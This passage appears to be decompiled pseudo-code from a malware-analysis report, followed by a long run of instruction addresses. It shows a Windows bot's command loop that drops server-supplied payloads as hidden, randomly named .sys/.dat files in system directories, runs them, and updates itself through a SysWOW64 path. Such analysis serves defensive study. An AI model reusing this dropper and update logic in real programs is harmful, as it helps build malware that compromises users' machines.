																	} while (_t748 != 0);
																	_t429 = _t428 - _t736;
																	_v12 = _t429;
																	__eflags = _t429;
																	if(_t429 <= 0) {
																		goto L204;
																	}
																	E0012E8A1(_t748, 1, "localcfg", "except_info", 0x130264);
																	_v39 = 0xf;
																	_t434 = E0012C65C(_v16,  &_v640,  &_v92,  *0x1336b0, _v12,  &_v52);
																	_t811 = _t811 + 0x28;
																	__eflags = _t434;
																	if(_t434 <= 0) {
																		break;
																	}
																	goto L204;
																}
																_t760 = 0;
																__eflags =  *0x132184; // 0x0
																if(__eflags != 0) {
																	E00126F5F( &_v408, 0x120);
																	_t449 =  *0x132130; // 0x210
																	_push(0x132184);
																	asm("sbb eax, eax");
																	_push( &_v408);
																	_t453 = ( ~(_t449 & 0x00000600) & 0x00000020) + 0x20;
																	__eflags = _t453;
																	_push(_t453);
																	_push( *0x132159 & 0x000000ff);
																	_push( *0x132134);
																	_push( *0x132120);
																	_t456 = wsprintfA( *0x1336b0, E00122544(0x1322f8, 0x130fa0, 0x27, 0xe4, 0xc8));
																	_t811 = _t811 + 0x34;
																	_t760 = _t456;
																}
																_t793 =  *0x1322d8; // 0x0
																__eflags = _t793;
																if(_t793 == 0) {
																	L193:
																	__eflags = _t760;
																	if(_t760 == 0) {
																		goto L199;
																	}
																	_v39 = 0xb;
																	_t438 = E0012C65C(_v16,  &_v640,  &_v92,  *0x1336b0, _t760,  &_v52);
																	_t811 = _t811 + 0x18;
																	__eflags = _t438;
																	if(_t438 <= 0) {
																		break;
																	}
																	__eflags =  *0x132184; // 0x0
																	if(__eflags != 0) {
																		 *0x132184 = 0;
																	}
																	_t439 =  *0x1322d8; // 0x0
																	__eflags = _t439;
																	if(_t439 != 0) {
																		E0012EC2E(_t439);
																		 *0x1322d8 = 0;
																	}
																	goto L199;
																} else {
																	_t441 = _t793;
																	_t293 = _t441 + 1; // 0x1
																	_t738 = _t293;
																	do {
																		_t748 =  *_t441;
																		_t441 = _t441 + 1;
																		__eflags = _t748;
																	} while (_t748 != 0);
																	_v60 = _t441 - _t738;
																	_t444 =  *0x1336b0; // 0x3e00000
																	E0012EE08( &(_t444[_t760]), _t793, _t441 - _t738 + 1);
																	_t811 = _t811 + 0xc;
																	_t760 =  &(_v60[_t760]);
																	__eflags = _t760;
																	goto L193;
																}
															}
															while(1) {
																_t459 = E0012C06C( &_v24,  &_v39,  *0x1336b0, 0x100000);
																_t811 = _t811 + 0x10;
																__eflags = _t459;
																if(_t459 == 0) {
																	goto L186;
																}
																_t462 = E0012C65C(_t757,  &_v640,  &_v92,  *0x1336b0, _t459,  &_v52);
																_t811 = _t811 + 0x18;
																__eflags = _t462;
																if(_t462 <= 0) {
																	goto L228;
																}
															}
															goto L186;
														}
														_push(0x71c7);
														_push( *0x1336b0);
														_t463 = E0012E7B4();
														__eflags = _t463;
														if(_t463 <= 0) {
															goto L182;
														}
														_v39 = 2;
														_t467 = E0012C65C(_t757,  &_v640,  &_v92,  *0x1336b0, _t463 * 0x24,  &_v52);
														_t811 = _t811 + 0x18;
														__eflags = _t467;
														if(_t467 <= 0) {
															break;
														}
														goto L182;
													}
													E00123A00(_t697,  *0x1336b0);
													_v39 = 3;
													_t472 = E0012C65C(_t757,  &_v640,  &_v92,  *0x1336b0, 0x28,  &_v52);
													_t811 = _t811 + 0x1c;
													__eflags = _t472;
													if(_t472 <= 0) {
														break;
													}
													goto L179;
												}
												_push(_t697);
												_push(0x100000);
												_push(_t403);
												while(1) {
													_t473 = E00123C09(_t748);
													_t811 = _t811 + 0xc;
													__eflags = _t473;
													if(_t473 == 0) {
														goto L177;
													}
													_t697 =  &_v52;
													_v39 = 4;
													_t476 = E0012C65C(_t757,  &_v640,  &_v92,  *0x1336b0, _t473,  &_v52);
													_t811 = _t811 + 0x18;
													__eflags = _t476;
													if(_t476 <= 0) {
														goto L228;
													}
													_t478 = _v24 & 0x00000010;
													__eflags = _t478;
													_push(_t478);
													_push(0x100000);
													_push( *0x1336b0);
												}
												goto L177;
											}
											__eflags = _t395 - 2;
											if(_t395 == 2) {
												_t479 = E0012DF4C(_t748,  *0x1336b0);
												__eflags = _t479;
												if(_t479 != 0) {
													_t480 =  *0x1336b0; // 0x3e00000
													E0012ED3B( &(_t480[4]), "work_srv", 8);
													_t483 =  *0x1336b0; // 0x3e00000
													_t811 = _t811 + 0xc;
													__eflags =  *_t483 - 1;
													if( *_t483 == 1) {
														_t485 = E0012EED1( &(_t483[4]), "work_srv");
														__eflags = _t485;
														if(_t485 == 0) {
															 *0x133680 = 0;
															 *0x133674 = 0;
															 *0x133678 = 0;
															 *0x13367c = 0;
															E0012C517();
															_v68 = 1;
														}
													}
												}
												continue;
											}
											__eflags = _t395 - 0xa;
											if(__eflags == 0) {
												E001231D0( *0x1336b0, _v52);
												L46:
												continue;
											}
											if(__eflags <= 0) {
												L156:
												_t763 = 0;
												__eflags = 0;
												do {
													_t249 = _t763 + 0x133300; // 0x0
													_t488 =  *_t249;
													__eflags = _t488;
													if(_t488 == 0) {
														goto L165;
													}
													_t795 =  *(_t488 + 0x40);
													__eflags = _t795;
													if(_t795 == 0) {
														goto L165;
													}
													_t748 = 0;
													_t489 = _t488 + 0xc;
													__eflags = _t489;
													while(1) {
														_t705 =  *_t489;
														__eflags = _t705;
														if(_t705 == 0) {
															goto L165;
														}
														__eflags = _t705 - _v39;
														if(_t705 == _v39) {
															 *_t795(_v39,  *0x1336b0, _v52);
															_t811 = _t811 + 0xc;
															goto L165;
														}
														_t748 = _t748 + 1;
														_t489 = _t489 + 4;
														__eflags = _t748 - 0xa;
														if(_t748 < 0xa) {
															continue;
														}
														goto L165;
													}
													L165:
													_t763 = _t763 + 4;
													__eflags = _t763 - 0x80;
												} while (_t763 < 0x80);
												continue;
											}
											__eflags = _t395 - 0xc;
											if(_t395 <= 0xc) {
												_t796 =  *0x1336b0; // 0x3e00000
												_t764 = 0;
												_v60 = 0;
												_v8 = _t796;
												__eflags =  *_t796;
												if( *_t796 <= 0) {
													L57:
													_t701 =  *0x1336b0; // 0x3e00000
													_t93 = _t764 * 8; // 0x3e00004
													_t797 =  &(_t701[_t93 + 4]);
													_t492 = _v52 + 4 + _t764 * 8;
													_t704 = _t797[0x124] + 0x128;
													_v8 = _t492;
													__eflags = _t797[0x124] + 0x128 - _t492;
													while(1) {
														_v12 = 0;
														if(__eflags > 0) {
															break;
														}
														__eflags = _v8;
														if(_v8 <= 0) {
															break;
														}
														__eflags =  *_t797 & 0x00000003;
														if(( *_t797 & 0x00000003) == 0) {
															L150:
															_t494 = _t797[0x124];
															_t704 = 0xfffffed8 - _t494;
															_v8 =  &(_v8[0xfffffffffffffed8]);
															_t797 =  &(_t797[_t494 + 0x128]);
															__eflags = _t797[0x124] + 0x128 - _v8;
															continue;
														} else {
															E0012EE2A(_t704,  &_v408, 0, 0x120);
															_t499 =  *_t797;
															_t811 = _t811 + 0xc;
															_t765 = 0;
															_t711 = 0x100;
															__eflags = _t499 & 0x00000f80;
															if((_t499 & 0x00000f80) == 0) {
																_t618 = _t499 | 0x00000100;
																__eflags = _t618;
																 *_t797 = _t618;
															}
															_t500 =  *_t797;
															__eflags = _t500 & 0x00000800;
															if((_t500 & 0x00000800) != 0) {
																_t616 = _t500 & 0xfffff7ff;
																 *_t797 = _t616;
																__eflags =  *0x13201e; // 0x0
																if(__eflags == 0) {
																	_t617 = _t616 | 0x00000200;
																	__eflags = _t617;
																} else {
																	_t617 = _t616 | _t711;
																}
																 *_t797 = _t617;
															}
															_t501 =  *_t797;
															__eflags = _t501;
															if(_t501 >= 0) {
																__eflags = _t711 & _t501;
																if((_t711 & _t501) == 0) {
																	__eflags = _t501 & 0x00000200;
																	if((_t501 & 0x00000200) == 0) {
																		__eflags = _t501 & 0x00000400;
																		if((_t501 & 0x00000400) == 0) {
																			goto L96;
																		}
																		GetSystemDirectoryA( &_v408, 0x100);
																		_t595 =  &_v408;
																		_t775 = _t595 + 1;
																		do {
																			_t723 =  *_t595;
																			_t595 = _t595 + 1;
																			__eflags = _t723;
																		} while (_t723 != 0);
																		_t596 = _t595 - _t775;
																		__eflags = _t596;
																		if(_t596 != 0) {
																			__eflags =  *((char*)(_t806 + _t596 - 0x195)) - 0x5c;
																			if( *((char*)(_t806 + _t596 - 0x195)) != 0x5c) {
																				 *((char*)(_t806 + _t596 - 0x194)) = 0x5c;
																			}
																		}
																		E0012EF1E( &_v408, "drivers\\");
																		_t776 =  &_v408;
																		_t141 = _t776 + 1; // 0x5d
																		_t711 = _t141;
																		do {
																			_t599 =  *_t776;
																			_t776 = _t776 + 1;
																			__eflags = _t599;
																		} while (_t599 != 0);
																		_t765 = _t776 - _t711;
																		__eflags = _t765;
																		goto L96;
																	}
																	GetSystemDirectoryA( &_v408, 0x100);
																	_t777 =  &_v408;
																	_t602 = _t777 + 1;
																	do {
																		_t711 =  *_t777;
																		_t777 = _t777 + 1;
																		__eflags = _t711;
																	} while (_t711 != 0);
																	_t765 = _t777 - _t602;
																	__eflags = _t765;
																	goto L83;
																} else {
																	GetEnvironmentVariableA(E00122544(0x1322f8, 0x130a3c, 0xc, 0xe4, 0xc8),  &_v408, 0x100);
																	E0012EE2A(_t711, 0x1322f8, 0, 0x100);
																	_t607 =  &_v408;
																	_t811 = _t811 + 0x20;
																	_t779 = _t607 + 1;
																	goto L77;
																	L83:
																	__eflags = _t765;
																	if(_t765 == 0) {
																		goto L96;
																	}
																	__eflags =  *((char*)(_t806 + _t765 - 0x195)) - 0x5c;
																	goto L85;
																	L77:
																	_t711 =  *_t607;
																	_t607 = _t607 + 1;
																	__eflags = _t711;
																	if(_t711 != 0) {
																		goto L77;
																	} else {
																		_t765 = _t607 - _t779;
																		goto L83;
																	}
																}
															} else {
																_t109 =  &(_t797[4]); // 0x3e00008
																_t780 = _t109;
																_t609 = _t109;
																_t110 =  &(_t609[1]); // 0x3e00009
																_t726 = _t110;
																goto L69;
																do {
																	L71:
																	_t711 =  *_t613;
																	_t613 = _t613 + 1;
																	__eflags = _t711;
																} while (_t711 != 0);
																_t765 = _t613 - _t781;
																__eflags = _t765;
																if(_t765 == 0) {
																	L96:
																	__eflags =  *_t797 & 0x00000004;
																	if(( *_t797 & 0x00000004) == 0) {
																		_t165 =  &(_t797[0x104]); // 0x3e00108
																		_t502 = _t165;
																		L106:
																		_push(_t502);
																		L107:
																		lstrcatA( &_v408, ??);
																		L108:
																		__eflags =  *_t797 & 0x00000040;
																		if(( *_t797 & 0x00000040) != 0) {
																			E00128E26(_t711, _t748, 0x22c808, 0, 0, 0, 0,  &_v56);
																			_t811 = _t811 + 0x18;
																		}
																		__eflags = _v39 - 0xc;
																		if(_v39 == 0xc) {
																			_t583 = E0012EE95( &_v408, ".dat");
																			_pop(_t711);
																			__eflags = _t583;
																			if(_t583 != 0) {
																				SetFileAttributesA( &_v408, 0x80);
																			}
																		}
																		_t766 = CreateFileA( &_v408, 0xc0000000, 0, 0, 2, 0x80, 0);
																		__eflags = _t766 - 0xffffffff;
																		if(_t766 == 0xffffffff) {
																			E0012EE2A(_t711,  &_v408, 0, 0x120);
																			GetEnvironmentVariableA(E00122544(0x1322f8, 0x130a3c, 0xc, 0xe4, 0xc8),  &_v408, 0x100);
																			E0012EE2A(_t711, 0x1322f8, 0, 0x100);
																			_t513 =  &_v408;
																			_t811 = _t811 + 0x2c;
																			_t768 = _t513 + 1;
																			do {
																				_t712 =  *_t513;
																				_t513 = _t513 + 1;
																				__eflags = _t712;
																			} while (_t712 != 0);
																			_t514 = _t513 - _t768;
																			__eflags = _t514;
																			if(_t514 != 0) {
																				__eflags =  *((char*)(_t806 + _t514 - 0x195)) - 0x5c;
																				if( *((char*)(_t806 + _t514 - 0x195)) != 0x5c) {
																					 *((char*)(_t806 + _t514 - 0x194)) = 0x5c;
																				}
																			}
																			_t210 =  &(_t797[0x104]); // 0x3e00108
																			lstrcatA( &_v408, _t210);
																			__eflags = _v39 - 0xc;
																			if(_v39 == 0xc) {
																				_t545 = E0012EE95( &_v408, ".dat");
																				_pop(_t712);
																				__eflags = _t545;
																				if(_t545 != 0) {
																					SetFileAttributesA( &_v408, 0x80);
																				}
																			}
																			_t769 = CreateFileA( &_v408, 0xc0000000, 0, 0, 2, 0x80, 0);
																			__eflags = _t769 - 0xffffffff;
																			if(_t769 != 0xffffffff) {
																				_t218 =  &(_t797[0x128]); // 0x3e0012c
																				WriteFile(_t769, _t218, _t797[0x124],  &_v56, 0);
																				CloseHandle(_t769);
																				__eflags = _v39 - 0xc;
																				if(_v39 == 0xc) {
																					_t541 = E0012EE95( &_v408, ".dat");
																					_pop(_t712);
																					__eflags = _t541;
																					if(_t541 != 0) {
																						SetFileAttributesA( &_v408, 2);
																					}
																				}
																				_v12 = 1;
																			}
																			goto L143;
																		} else {
																			_t176 =  &(_t797[0x128]); // 0x3e0012c
																			WriteFile(_t766, _t176, _t797[0x124],  &_v56, 0);
																			CloseHandle(_t766);
																			__eflags = _v39 - 0xc;
																			if(_v39 == 0xc) {
																				_t579 = E0012EE95( &_v408, ".dat");
																				__eflags = _t579;
																				if(_t579 != 0) {
																					SetFileAttributesA( &_v408, 2);
																				}
																			}
																			_v12 = 1;
																			_t552 = E0012EE95( &_v408, ".dat");
																			_pop(_t712);
																			__eflags = _t552;
																			if(_t552 == 0) {
																				L143:
																				__eflags =  *_t797 & 0x00000040;
																				if(( *_t797 & 0x00000040) != 0) {
																					E00128E26(_t712, _t748, 0x22c80c, 0, 0, 0, 0,  &_v56);
																					_t811 = _t811 + 0x18;
																				}
																				__eflags =  *_t797 & 0x00000002;
																				if(( *_t797 & 0x00000002) != 0) {
																					__eflags = _v12;
																					if(__eflags != 0) {
																						E00127EAD(_t748, __eflags, 1);
																						E00127FCF(_t712);
																						_t770 = 0x44;
																						E0012EE2A(_t712,  &_v876, 0, _t770);
																						_t811 = _t811 + 0x10;
																						_v876.cb = _t770;
																						_t527 = CreateProcessA( &_v408, 0x130264, 0, 0, 0, 0x8000000, 0, 0,  &_v876,  &_v424);
																						__eflags = _t527;
																						if(_t527 == 0) {
																							E00127EE6(_t712);
																							E00127EAD(_t748, __eflags, 0);
																							DeleteFileA( &_v408);
																						} else {
																							CloseHandle(_v424.hThread);
																							CloseHandle(_v424);
																						}
																					}
																				}
																				goto L150;
																			} else {
																				E0012EE2A(_t712,  &_v408, 0, 0x120);
																				GetEnvironmentVariableA(E00122544(0x1322f8, 0x130a3c, 0xc, 0xe4, 0xc8),  &_v408, 0x100);
																				E0012EE2A(_t712, 0x1322f8, 0, 0x100);
																				_t559 =  &_v408;
																				_t811 = _t811 + 0x2c;
																				_t773 = _t559 + 1;
																				do {
																					_t712 =  *_t559;
																					_t559 = _t559 + 1;
																					__eflags = _t712;
																				} while (_t712 != 0);
																				_t560 = _t559 - _t773;
																				__eflags = _t560;
																				if(_t560 != 0) {
																					__eflags =  *((char*)(_t806 + _t560 - 0x195)) - 0x5c;
																					if( *((char*)(_t806 + _t560 - 0x195)) != 0x5c) {
																						 *((char*)(_t806 + _t560 - 0x194)) = 0x5c;
																					}
																				}
																				_t190 =  &(_t797[0x104]); // 0x3e00108
																				lstrcatA( &_v408, _t190);
																				__eflags = _v39 - 0xc;
																				if(_v39 == 0xc) {
																					_t575 = E0012EE95( &_v408, ".dat");
																					_pop(_t712);
																					__eflags = _t575;
																					if(_t575 != 0) {
																						SetFileAttributesA( &_v408, 0x80);
																					}
																				}
																				_t774 = CreateFileA( &_v408, 0xc0000000, 0, 0, 2, 0x80, 0);
																				__eflags = _t774 - 0xffffffff;
																				if(_t774 != 0xffffffff) {
																					_t198 =  &(_t797[0x128]); // 0x3e0012c
																					WriteFile(_t774, _t198, _t797[0x124],  &_v56, 0);
																					CloseHandle(_t774);
																					__eflags = _v39 - 0xc;
																					if(_v39 == 0xc) {
																						_t571 = E0012EE95( &_v408, ".dat");
																						_pop(_t712);
																						__eflags = _t571;
																						if(_t571 != 0) {
																							SetFileAttributesA( &_v408, 2);
																						}
																					}
																				}
																				goto L143;
																			}
																		}
																	}
																	_t588 = E0012ECA5();
																	_t711 = 5;
																	_t748 = _t588 % _t711 + 3;
																	__eflags = _t748;
																	_v17 = _t748;
																	if(_t748 == 0) {
																		L99:
																		 *(_t806 + _t765 - 0x194) = 0;
																		_t590 =  *_t797;
																		__eflags = _t590 & 0x0000000a;
																		if((_t590 & 0x0000000a) != 0) {
																			_t502 = E00122544(0x1322f8, 0x130694, 5, 0xe4, 0xc8);
																			_t811 = _t811 + 0x14;
																			goto L106;
																		}
																		__eflags = _t590 & 0x00000010;
																		if((_t590 & 0x00000010) == 0) {
																			__eflags = _t590 & 0x00000020;
																			if((_t590 & 0x00000020) == 0) {
																				goto L108;
																			}
																			_push(".dat");
																			goto L107;
																		}
																		_push(".sys");
																		goto L107;
																	} else {
																		goto L98;
																	}
																	do {
																		L98:
																		_t591 = E0012ECA5();
																		_t711 = 0x19;
																		_t748 = _t591 % _t711 + 0x61;
																		 *(_t806 + _t765 - 0x194) = _t748;
																		_t765 = _t765 + 1;
																		_t155 =  &_v17;
																		 *_t155 = _v17 - 1;
																		__eflags =  *_t155;
																	} while ( *_t155 != 0);
																	goto L99;
																}
																_t615 =  *((intOrPtr*)(_t806 + _t765 - 0x195));
																__eflags = _t615 - 0x5c;
																if(_t615 != 0x5c) {
																	__eflags = _t615 - 0x2f;
																	L85:
																	if(__eflags != 0) {
																		 *(_t806 + _t765 - 0x194) = 0x5c;
																		_t765 = _t765 + 1;
																	}
																}
																goto L96;
																L69:
																_t748 =  *_t609;
																_t609 =  &(_t609[1]);
																__eflags = _t748;
																if(_t748 != 0) {
																	goto L69;
																} else {
																	__eflags = _t609 - _t726;
																	E0012EE08( &_v408, _t780, _t609 - _t726);
																	_t613 =  &_v408;
																	_t811 = _t811 + 0xc;
																	_t781 = _t613 + 1;
																	goto L71;
																}
															}
														}
													}
													__eflags =  *0x13211c & 0x00000004;
													if(( *0x13211c & 0x00000004) == 0) {
														continue;
													}
													__eflags = _v60;
													if(_v60 == 0) {
														continue;
													}
													__eflags =  *0x13201d; // 0x0
													if(__eflags == 0) {
														continue;
													}
													__imp__#3(_v16);
													Sleep(0x3e8);
													E0012E318();
													ExitProcess(0);
												} else {
													_t798 =  &(_t796[8]);
													__eflags = _t798;
													do {
														_t621 =  *(_t798 - 4);
														__eflags = _t621;
														if(_t621 == 0) {
															_v60 = 1;
															 *0x132138 =  *_t798;
														} else {
															_t624 = _t621 - 1;
															__eflags = _t624;
															if(_t624 == 0) {
																E0012EA84(1, "localcfg", "lid_file_upd",  *_t798);
																_t811 = _t811 + 0x10;
																 *0x13213c =  *_t798;
															} else {
																__eflags = _t624 == 1;
																if(_t624 == 1) {
																	E0012EA84(1, "localcfg", "flags_upd",  *_t798);
																	_t811 = _t811 + 0x10;
																	 *0x13211c =  *0x13211c |  *_t798;
																}
															}
														}
														_t764 = _t764 + 1;
														_t798 =  &(_t798[2]);
														__eflags = _t764 -  *_v8;
													} while (_t764 <  *_v8);
													goto L57;
												}
											}
											__eflags = _t395 - 0x1b;
											if(_t395 != 0x1b) {
												goto L156;
											}
											__eflags = _v52 - 0xc;
											if(_v52 <= 0xc) {
												_t630 =  *0x1336b0; // 0x3e00000
												 *0x1321a4 = _t630[4];
												 *0x1322d4 = _t630[8];
												_t632 = E0012F04E(0);
												asm("adc edx, ebx");
												 *0x1336a8 = _t632 + 0xe10;
												 *0x1336ac = _t748;
												continue;
											}
											_t634 = E00127E2F(_t748);
											__eflags = _t634;
											if(_t634 != 0) {
												continue;
											}
											_t635 =  *0x1336b0; // 0x3e00000
											_v12 = _t635;
											__eflags = "C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe"; // 0x43
											if(__eflags == 0) {
												L45:
												_t636 = _v12;
												 *0x1321a4 =  *(_t636 + 4);
												 *0x1322d4 =  *(_t636 + 8);
												E00127EAD(_t748, __eflags, 0);
												goto L46;
											} else {
												GetTempPathA(0x120,  &_v408);
												_t642 = E00128274( &_v408);
												_pop(_t709);
												_t782 = _t642;
												_t801 = (E0012ECA5() & 0x00000003) + 5;
												goto L38;
												L38:
												__eflags = _t801;
												if(_t801 > 0) {
													_t644 = E0012ECA5();
													_t709 = 0x1a;
													_t748 = _t644 % _t709 + 0x61;
													 *(_t806 + _t782 - 0x194) = _t748;
													_t782 = _t782 + 1;
													_t801 = _t801 - 1;
													__eflags = _t801;
													goto L38;
												} else {
													E0012EF00(_t806 + _t782 - 0x194, E00122544(0x1322f8, 0x130694, 5, 0xe4, 0xc8));
													E0012EE2A(_t709, 0x1322f8, 0, 0x100);
													_t811 = _t811 + 0x28;
													_t651 = CreateFileA( &_v408, 0x40000000, 0, 0, 2, 0, 0);
													_v8 = _t651;
													__eflags = _t651 - 0xffffffff;
													if(__eflags != 0) {
														_t657 = WriteFile(_v8,  &(_v12[0xc]), _v52 + 0xfffffff4,  &_v100, 0);
														_push(_v8);
														__eflags = _t657;
														if(__eflags == 0) {
															CloseHandle();
														} else {
															CloseHandle();
															_push("C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe");
															_push( &_v408);
															wsprintfA( &_v1176, E00122544(0x1322f8, 0x130fe4, 0xc, 0xe4, 0xc8));
															E0012EE2A(_t709, 0x1322f8, 0, 0x100);
															_t803 = 0x44;
															E0012EE2A(_t709,  &_v808, 0, 0x1322f8);
															_v808.cb = _t803;
															E0012EE2A(_t709,  &_v120, 0, 0x10);
															_t811 = _t811 + 0x48;
															E00127FCF(_t709);
															_t673 = CreateProcessA(0,  &_v1176, 0, 0, 0, 0x8000000, 0, 0,  &_v808,  &_v120);
															__eflags = _t673;
															if(_t673 != 0) {
																WaitForSingleObject(_v120.hProcess, 0xea60);
																CloseHandle(_v120.hThread);
																CloseHandle(_v120);
																_t681 = E0012F04E(0) + 0xe10;
																__eflags = _t681;
																asm("adc edx, ebx");
																_pop(_t709);
																 *0x1336a8 = _t681;
																 *0x1336ac = _t748;
															}
															E00127EE6(_t709);
															DeleteFileA( &_v408);
														}
													}
													goto L45;
												}
											}
										}
										L228:
										__imp__#3(_v16);
										E0012E318();
										return _v68;
									} else {
										__imp__#3(_v16);
										goto L21;
									}
								}
								L15:
								__imp__#3(_v16); // executed
							}
							return E0012C8AA(_t829);
						} else {
							_t805 =  *0x133670; // 0x2
							while(_v12 < _t805) {
								_t7 = _t747 + 1; // 0x1
								asm("cdq");
								_t747 = _t7 % _t805;
								 *0x13367c =  *0x13367c + 1;
								_v12 = _v12 + 1;
								 *0x133674 = _t747;
								if( *((intOrPtr*)(_t747 * 0x45 + _t688 + 0x41)) == 0) {
									continue;
								}
								goto L11;
							}
							goto L11;
						}
					}
					_t686 = E0012EBCC(0x100000);
					 *0x1336b0 = _t686;
					if(_t686 == 0) {
						goto L21;
					}
					goto L7;
				}
				_t820 =  *0x133670; // 0x2
				if(_t820 != 0) {
					goto L3;
				}
				goto L2;
			}



















































































































































































                                                                                0x0012c921
                                                                                0x0012c924
                                                                                0x0012c927
                                                                                0x0012c92d
                                                                                0x0012c937
                                                                                0x0012c937
                                                                                0x0012c93c
                                                                                0x0012c93c
                                                                                0x0012c942
                                                                                0x0012cb69
                                                                                0x0012cb69
                                                                                0x00000000
                                                                                0x0012cb69
                                                                                0x0012c948
                                                                                0x0012c94e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012c973
                                                                                0x0012c986
                                                                                0x0012c98b
                                                                                0x0012c990
                                                                                0x0012c993
                                                                                0x0012c998
                                                                                0x0012c99e
                                                                                0x0012c9b8
                                                                                0x0012c9b8
                                                                                0x0012c9be
                                                                                0x0012c9c9
                                                                                0x0012c9d0
                                                                                0x0012c9fd
                                                                                0x0012c9fd
                                                                                0x0012ca00
                                                                                0x0012ca03
                                                                                0x0012ca08
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012ca18
                                                                                0x0012ca1f
                                                                                0x0012ca22
                                                                                0x0012ca24
                                                                                0x0012ca3f
                                                                                0x0012ca44
                                                                                0x0012ca47
                                                                                0x0012ca49
                                                                                0x0012ca5e
                                                                                0x0012ca63
                                                                                0x0012ca6e
                                                                                0x0012ca6f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012ca71
                                                                                0x0012ca78
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012ca7a
                                                                                0x0012ca81
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012ca95
                                                                                0x0012ca9b
                                                                                0x0012caa1
                                                                                0x0012caa7
                                                                                0x0012cab8
                                                                                0x0012cac2
                                                                                0x0012cac5
                                                                                0x0012cad4
                                                                                0x0012cae7
                                                                                0x0012caf7
                                                                                0x0012cb09
                                                                                0x0012cb27
                                                                                0x0012cb2d
                                                                                0x0012cb37
                                                                                0x0012cb3d
                                                                                0x0012cb47
                                                                                0x0012cb4d
                                                                                0x0012cb54
                                                                                0x0012cb59
                                                                                0x0012cb5c
                                                                                0x0012cb5e
                                                                                0x0012cb70
                                                                                0x0012cb76
                                                                                0x0012cb7c
                                                                                0x0012cb7c
                                                                                0x0012cb7c
                                                                                0x0012cb9e
                                                                                0x0012cba3
                                                                                0x0012cba6
                                                                                0x0012cba9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012cbaf
                                                                                0x0012cbb1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012cbb3
                                                                                0x0012cbb6
                                                                                0x0012cbb8
                                                                                0x0012daea
                                                                                0x0012daea
                                                                                0x0012daeb
                                                                                0x0012daf0
                                                                                0x0012daf2
                                                                                0x0012daf5
                                                                                0x0012daf7
                                                                                0x0012dafd
                                                                                0x0012daff
                                                                                0x0012db02
                                                                                0x0012db0b
                                                                                0x0012db1b
                                                                                0x0012db20
                                                                                0x0012db20
                                                                                0x0012db02
                                                                                0x0012dafd
                                                                                0x0012db23
                                                                                0x0012db24
                                                                                0x0012db24
                                                                                0x00000000
                                                                                0x0012db29
                                                                                0x0012cbbe
                                                                                0x0012cbc1
                                                                                0x0012d662
                                                                                0x0012d667
                                                                                0x0012d669
                                                                                0x0012d66c
                                                                                0x0012d66f
                                                                                0x0012d672
                                                                                0x0012d675
                                                                                0x0012d6c7
                                                                                0x0012d6c7
                                                                                0x0012d6cb
                                                                                0x0012d707
                                                                                0x0012d707
                                                                                0x0012d70b
                                                                                0x0012d754
                                                                                0x0012d754
                                                                                0x0012d758
                                                                                0x0012d79e
                                                                                0x0012d79e
                                                                                0x0012d7a2
                                                                                0x0012d8b3
                                                                                0x0012d8b3
                                                                                0x0012d8ba
                                                                                0x0012d93a
                                                                                0x0012d93a
                                                                                0x0012d941
                                                                                0x0012da0e
                                                                                0x0012da0e
                                                                                0x0012da11
                                                                                0x0012da11
                                                                                0x0012da14
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012da1d
                                                                                0x0012da23
                                                                                0x0012da25
                                                                                0x0012da90
                                                                                0x0012da90
                                                                                0x0012da94
                                                                                0x0012da9b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012daa1
                                                                                0x0012daa4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012dabf
                                                                                0x0012dac2
                                                                                0x0012dac7
                                                                                0x0012daca
                                                                                0x0012dacc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012dacc
                                                                                0x0012da27
                                                                                0x0012da2a
                                                                                0x0012da2c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012da42
                                                                                0x0012da7d
                                                                                0x0012da7d
                                                                                0x0012da80
                                                                                0x0012da83
                                                                                0x0012da85
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012da5f
                                                                                0x0012da64
                                                                                0x0012da67
                                                                                0x0012da69
                                                                                0x0012da89
                                                                                0x00000000
                                                                                0x0012da89
                                                                                0x0012da7a
                                                                                0x0012da7a
                                                                                0x00000000
                                                                                0x0012da87
                                                                                0x00000000
                                                                                0x0012da11
                                                                                0x0012d947
                                                                                0x0012d94c
                                                                                0x0012d94e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d955
                                                                                0x0012d95b
                                                                                0x0012d961
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d967
                                                                                0x0012d975
                                                                                0x0012d975
                                                                                0x0012d97b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d981
                                                                                0x0012d987
                                                                                0x0012d9c9
                                                                                0x0012d9c9
                                                                                0x0012d9ce
                                                                                0x0012d9d0
                                                                                0x0012d9d6
                                                                                0x0012d9d9
                                                                                0x0012d9df
                                                                                0x0012d9f7
                                                                                0x0012d9fe
                                                                                0x0012da03
                                                                                0x0012da06
                                                                                0x0012da08
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012da08
                                                                                0x0012d998
                                                                                0x0012d99a
                                                                                0x0012d99d
                                                                                0x0012d99f
                                                                                0x0012d9ab
                                                                                0x0012d9b4
                                                                                0x0012d9b9
                                                                                0x0012d9be
                                                                                0x0012d9be
                                                                                0x0012d9c1
                                                                                0x0012d9c7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d9c7
                                                                                0x0012d969
                                                                                0x0012d96f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012d96f
                                                                                0x0012d8da
                                                                                0x0012d8df
                                                                                0x0012d8e4
                                                                                0x0012d8e7
                                                                                0x0012d8e7
                                                                                0x0012d8ea
                                                                                0x0012d8ea
                                                                                0x0012d8ec
                                                                                0x0012d8ed
                                                                                0x0012d8ed
                                                                                0x0012d8f1
                                                                                0x0012d8f3
                                                                                0x0012d8f6
                                                                                0x0012d8f8
                                                                                0x00000000
                                                                                0x00000000
